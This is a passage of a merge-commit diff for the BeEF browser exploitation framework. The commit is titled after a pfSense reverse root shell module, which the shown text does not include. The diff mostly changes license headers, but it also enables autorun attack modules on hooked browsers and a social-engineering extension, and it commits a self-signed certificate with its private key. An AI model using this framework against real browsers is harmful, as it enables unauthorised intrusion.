Merge pull request #823 from bmantra/master

pfSense reverse root remote shell #812

BeEFLive.sh

@@ -0,0 +1,2 @@
+# Reference for old (<1.2) versions of BeEF Live
+bash /opt/beef/liveCD/BeEFLive.sh

Gemfile

@@ -1,19 +1,9 @@
 # BeEF's Gemfile
 
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 # Gems only required on Windows, or with specific Windows issues
@@ -39,6 +29,9 @@ gem "erubis"
 gem "dm-migrations"
 gem "msfrpc-client"
 
+# notifications
+gem "twitter"
+
 if ENV['BEEF_TEST']
 # for running unit tests
   gem "test-unit"

INSTALL.txt

@@ -1,18 +1,8 @@
 ===============================================================================
    
-   Copyright 2012 Wade Alcorn wade@bindshell.net
-
-   Licensed under the Apache License, Version 2.0 (the "License");
-   you may not use this file except in compliance with the License.
-   You may obtain a copy of the License at
-
-       http://www.apache.org/licenses/LICENSE-2.0
-
-   Unless required by applicable law or agreed to in writing, software
-   distributed under the License is distributed on an "AS IS" BASIS,
-   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-   See the License for the specific language governing permissions and
-   limitations under the License.
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
 
 ===============================================================================
 

README

@@ -1,18 +1,8 @@
 ===============================================================================
    
-   Copyright 2012 Wade Alcorn wade@bindshell.net
-
-   Licensed under the Apache License, Version 2.0 (the "License");
-   you may not use this file except in compliance with the License.
-   You may obtain a copy of the License at
-
-       http://www.apache.org/licenses/LICENSE-2.0
-
-   Unless required by applicable law or agreed to in writing, software
-   distributed under the License is distributed on an "AS IS" BASIS,
-   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-   See the License for the specific language governing permissions and
-   limitations under the License.
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
 
 ===============================================================================
 

README.mkd

@@ -1,18 +1,8 @@
 ===============================================================================
    
-   Copyright 2012 Wade Alcorn wade@bindshell.net
-
-   Licensed under the Apache License, Version 2.0 (the "License");
-   you may not use this file except in compliance with the License.
-   You may obtain a copy of the License at
-
-       http://www.apache.org/licenses/LICENSE-2.0
-
-   Unless required by applicable law or agreed to in writing, software
-   distributed under the License is distributed on an "AS IS" BASIS,
-   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-   See the License for the specific language governing permissions and
-   limitations under the License.
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    See the file 'doc/COPYING' for copying permission
 
 ===============================================================================
 
@@ -72,7 +62,7 @@ __The following is for the impatient.__
 
 For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
 
-       $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
+       $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
 
 
 Usage 

Rakefile

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 task :default => ["quick"]

VERSION

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
-0.4.3.5-alpha
+0.4.4.1-alpha

beef

@@ -1,19 +1,9 @@
 #!/usr/bin/env ruby
 
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 # stop deprecation warning from being displayed
@@ -81,7 +71,7 @@ Socket.do_not_reverse_lookup = true
 case config.get("beef.database.driver")
   when "sqlite"
     DataMapper.setup(:default, "sqlite3://#{$root_dir}/#{config.get("beef.database.db_file")}")
-  when "mysql","postgres"
+  when "mysql", "postgres"
     DataMapper.setup(:default,
                      :adapter => config.get("beef.database.driver"),
                      :host => config.get("beef.database.db_host"),
@@ -124,12 +114,13 @@ print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}"
 #@note Starts the WebSocket server
 if config.get("beef.http.websocket.enable")
   BeEF::Core::Websocket::Websocket.instance
-  print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], secure [#{config.get("beef.http.websocket.secure")}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
+  print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
+  if config.get("beef.http.websocket.secure")
+    print_info "Starting WebSocketSecure server on port [#{config.get("beef.http.websocket.secure_port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
+  end
 end
 
 
-
-
 # @note Call the API method 'pre_http_start'
 BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server)
 
@@ -140,7 +131,7 @@ if config.get("beef.extension.console.shell.enable") == true
   begin
     FileUtils.mkdir_p(File.expand_path(config.get("beef.extension.console.shell.historyfolder")))
     BeEF::Extension::Console::Shell.new(BeEF::Extension::Console::Shell::DefaultPrompt,
-                                        BeEF::Extension::Console::Shell::DefaultPromptChar,{'config' => config, 'http_hook_server' => http_hook_server}).run
+                                        BeEF::Extension::Console::Shell::DefaultPromptChar, {'config' => config, 'http_hook_server' => http_hook_server}).run
   rescue Interrupt
   end
 else

beef_cert.pem

@@ -0,0 +1,19 @@
+-----BEGIN CERTIFICATE-----
+MIIDDjCCAnegAwIBAgIJAKNYRH/AaB3DMA0GCSqGSIb3DQEBBQUAMIGfMQswCQYD
+VQQGEwJBVTEUMBIGA1UECAwLQm92aW5lIExhbmQxDTALBgNVBAcMBEJlRUYxDTAL
+BgNVBAoMBEJlRUYxDTALBgNVBAsMBEJlRUYxJzAlBgNVBAMMHkJyb3dzZXIgRXhw
+bG9pdGF0aW9uIEZyYW1ld29yazEkMCIGCSqGSIb3DQEJARYVQmVFRkBkb250d3Jp
+dGVtZS5CZUVGMB4XDTEyMDgwNjEzMDUzOFoXDTEzMDgwNjEzMDUzOFowgZ8xCzAJ
+BgNVBAYTAkFVMRQwEgYDVQQIDAtCb3ZpbmUgTGFuZDENMAsGA1UEBwwEQmVFRjEN
+MAsGA1UECgwEQmVFRjENMAsGA1UECwwEQmVFRjEnMCUGA1UEAwweQnJvd3NlciBF
+eHBsb2l0YXRpb24gRnJhbWV3b3JrMSQwIgYJKoZIhvcNAQkBFhVCZUVGQGRvbnR3
+cml0ZW1lLkJlRUYwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALCxzu+rOTt2
+VBM5X5KL2xpDvMJ7wT0BSVgbkEF9Pd3+h3NbB/LST0n+Mwtnk4wLzmjmNiob3EdP
+0l+pKgIZYT8yHMvI3pwp0hmpE3D2bALyiQTOTjF0IhUeIYa9ZhEyeN+PgA6+Hs0Z
+F/0y0El2XjkPF42Dnmp9mLTSfScv1v4xAgMBAAGjUDBOMB0GA1UdDgQWBBTaXny0
+kTye7CAr0ronsg0ob63+kTAfBgNVHSMEGDAWgBTaXny0kTye7CAr0ronsg0ob63+
+kTAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBABTy5s/XRd6iBwxOgV6N
+B+cTRgmgHciujbI+0p4TkOkHvQPhhcD3207ndWWwv+Mc2XeQcXNaOfYUDkeCs64N
+JffqThykYOdagvCu1Gecw9BEKeijS9MAuNvtvP7fcUNUql+VeTFbxMBPGDhusafz
+GkY0IBg9+j6XX4JwEXxCGt0a
+-----END CERTIFICATE-----

beef_key.pem

@@ -0,0 +1,16 @@
+-----BEGIN PRIVATE KEY-----
+MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBALCxzu+rOTt2VBM5
+X5KL2xpDvMJ7wT0BSVgbkEF9Pd3+h3NbB/LST0n+Mwtnk4wLzmjmNiob3EdP0l+p
+KgIZYT8yHMvI3pwp0hmpE3D2bALyiQTOTjF0IhUeIYa9ZhEyeN+PgA6+Hs0ZF/0y
+0El2XjkPF42Dnmp9mLTSfScv1v4xAgMBAAECgYAKpDrNTmedACxiGAN8hPXGKCw3
+HlLuBKTRLJ/Mgel29DxeIy5gXnAuCaQzXKKTPabJxIugj5r9pH4MCtkf1T15Aib6
+4MFdx4UegllMUo7eUiuCtSmK9s0wEtJjShujBl4qQ10ZtWUh4Vd/clS88IjM/iPI
+5Ocoph5PUgFt/tX7DQJBAOkGptgdri39bRiSGaR/Si6YYpmMUFoQt+s2id8yH9QS
+26o8cHZKCahSiWLNi4rSzEJIOpXnP3n+Dcq2JttDWGcCQQDCHWgWSpdnX8uqp/Qo
+yp0RZJwyBFoba4bWhzoQJj+39P0+4FBaMlZyLHZ7nd4z0JiE5S3qA9xi8zjQVrrI
+rTWnAkEAmpPxBZfavWNJhW0VWYue1/36GkV73+MLPhq1pruHZZUE5o6lQ7KlaWUn
+AcW79WEUYjursVjvQKuI1pmyeOzZrQJBAIGQHSxbxyjBgPA8QDSF4EZ+r96Wlwoc
+QBiqk6+5x+fiBrJUCG3bkWWNldu2qFxPS63QRlAfGZeWHgK5ENzm95sCQQCe81hU
+WaVM9bmt0ZvfhfQXfgvf3xKNUFemd4skTMUDgNCH1OFULB/Mz16kJDdy0q0qUS88
+yBgay+U9QuoEO425
+-----END PRIVATE KEY-----

config.yaml

@@ -1,22 +1,12 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # BeEF Configuration file
 
 beef:
-    version: '0.4.3.5-alpha'
+    version: '0.4.4.1-alpha'
     debug: false
 
     restrictions:
@@ -30,6 +20,10 @@ beef:
         debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
         host: "0.0.0.0"
         port: "3000"
+        # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results.
+        # It's not advised to decrease it with tons of hooked browsers (more than 50),
+        # because it might impact performance. Also, enable WebSockets is generally better.
+        xhr_poll_timeout: 5000
         # if running behind a nat set the public ip address here
         #public: ""
         #public_port: "" # port setting is experimental
@@ -42,20 +36,35 @@ beef:
         # Prefer WebSockets over XHR-polling when possible.
         websocket:
           enable: false
-          secure: false # use WebSocketSecure
-          port: 11989
-          alive_timer: 1000 # poll BeEF every second
+          secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
+          port: 61985 # WS: good success rate through proxies
+          secure_port: 61986 # WSSecure
+          ws_poll_timeout: 1000 # poll BeEF every second
 
         # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
         web_server_imitation:
             enable: false
             type: "apache" #supported: apache, iis
 
+        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
+        https:
+            enable: false
+            # In production environments, be sure to use a valid certificate signed for the value
+            # used in beef.http.dns (the domain name of the server where you run BeEF)
+            key: "beef_key.pem"
+            cert: "beef_cert.pem"
+
     database:
         # For information on using other databases please read the
         # README.databases file
 
         # supported DBs: sqlite, mysql, postgres
+        # NOTE: you must change the Gemfile adding a gem require line like:
+        #   gem "dm-postgres-adapter"
+        # or
+        #   gem "dm-mysql-adapter"
+        # if you want to switch drivers from sqlite to postgres (or mysql).
+        # Finally, run a 'bundle install' command and start BeEF.
         driver: "sqlite"
 
         # db_file is only used for sqlite
@@ -73,6 +82,13 @@ beef:
         user:   "beef"
         passwd: "beef"
 
+    # Autorun modules as soon the browser is hooked.
+    # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
+    autorun:
+        enable: true
+        # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify
+        allow_user_notify: true
+
     crypto_default_value_length: 80
 
     # You may override default extension configuration parameters here
@@ -83,8 +99,12 @@ beef:
             enable: true
         metasploit:
             enable: false
-        console:
-            shell:
-                enable: false
+        social_engineering:
+            enable: true
         evasion:
             enable: false
+        console:
+             shell:
+                enable: false
+        ipec:
+            enable: true

core/api.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF

core/api/extension.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF

core/api/extensions.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module API

core/api/main/configuration.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module API

core/api/main/migration.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module API

core/api/main/network_stack/assethandler.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module API

core/api/main/server.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module API

core/api/main/server/hook.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module API

core/api/module.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module API

core/api/modules.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module API

core/bootstrap.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core
@@ -34,6 +24,7 @@ require 'core/main/handlers/browserdetails'
 
 # @note Include the network stack
 require 'core/main/network_stack/handlers/dynamicreconstruction'
+require 'core/main/network_stack/handlers/redirector'
 require 'core/main/network_stack/assethandler'
 require 'core/main/network_stack/api'
 
@@ -50,6 +41,7 @@ require 'core/hbmanager'
 ## @note Include RESTful API
 require 'core/main/rest/handlers/hookedbrowsers'
 require 'core/main/rest/handlers/modules'
+require 'core/main/rest/handlers/categories'
 require 'core/main/rest/handlers/logs'
 require 'core/main/rest/handlers/admin'
 require 'core/main/rest/api'

core/core.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
@@ -34,6 +24,7 @@ require 'core/main/constants/browsers'
 require 'core/main/constants/commandmodule'
 require 'core/main/constants/distributedengine'
 require 'core/main/constants/os'
+require 'core/main/constants/hardware'
 
 # @note Include core modules for beef
 require 'core/main/configuration'

core/extension.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Extension

core/extensions.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Extensions

core/filters.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Filters

core/filters/base.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Filters

core/filters/browser.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Filters
@@ -47,6 +37,16 @@ module Filters
     true
   end
 
+  # Check the Hardware name value - for example, 'iPhone'
+  # @param [String] str String for testing
+  # @return [Boolean] If the string has valid Hardware name characters
+  def self.is_valid_hwname?(str)
+    return false if not is_non_empty_string?(str)
+    return false if has_non_printable_char?(str)
+    return false if str.length < 2
+    true
+  end
+
   # Verify the browser version string is valid
   # @param [String] str String for testing
   # @return [Boolean] If the string has valid browser version characters

core/filters/command.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Filters

core/filters/http.rb

@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
